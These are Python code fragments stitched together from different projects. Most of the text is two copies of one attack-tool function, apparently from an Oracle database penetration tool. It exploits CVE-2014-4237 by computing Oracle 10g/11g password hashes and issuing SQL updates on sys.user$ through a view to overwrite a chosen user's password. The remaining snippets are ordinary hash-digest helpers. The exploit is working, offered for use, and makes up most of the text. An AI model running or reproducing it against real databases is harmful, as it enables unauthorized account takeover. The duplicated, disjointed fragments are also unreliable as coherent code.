def generate(self, cli_object): if cli_object.username is None: print "You must provide a username for oracle10 hashes!" return "Oracle10 Hashes require a username" generatedhash = oracle10.encrypt(cli_object.plaintext, user=cli_object.username) return generatedhash
def runCVEXXXYYYModule(args): ''' Run the CVE_XXXX_YYYY module ''' if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"], checkAccount=False) == False: return EXIT_MISS_ARGUMENT cve = CVE_XXXX_YYYY(args) status = cve.connection(stopIfError=True) if args['test-module'] == True: cve.testAll() if args['set-pwd-2014-4237'] != None: hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1]) hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0]) logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format( hash11g, hash10g, args['set-pwd-2014-4237'][0])) REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format( args['set-pwd-2014-4237'][0], hash10g, hash11g) REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format( args['set-pwd-2014-4237'][0], hash10g, hash11g) args['print'].title( "Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237" .format(args['set-pwd-2014-4237'][0], hash10g, hash11g)) status = cve.exploit_CVE_2014_4237( updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView= REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237) if status == True: cve.args['print'].goodNews( "The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!" .format(args['set-pwd-2014-4237'][0], args['set-pwd-2014-4237'][1])) elif status == False: cve.args['print'].badNews( "The password of '{0}' has NOT been replaced".format( args['set-pwd-2014-4237'][0])) elif status == None: cve.args['print'].goodNews( "The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!" .format(args['set-pwd-2014-4237'][0]))
def runCVEXXXYYYModule(args): ''' Run the CVE_XXXX_YYYY module ''' if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT cve = CVE_XXXX_YYYY(args) status = cve.connection(stopIfError=True) if args['test-module'] == True : cve.testAll() if args['set-pwd-2014-4237'] != None : hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1]) hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0]) logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0])) REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g) REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g) args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g)) status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237) if status == True: cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1])) elif status == False: cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0])) elif status == None: cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
def digest(self): return unhexlify(oracle10.encrypt(self.data[:64], user=self._user))
def digest(self): return oracle10.encrypt(self._data[:64], user=self._user).decode('hex')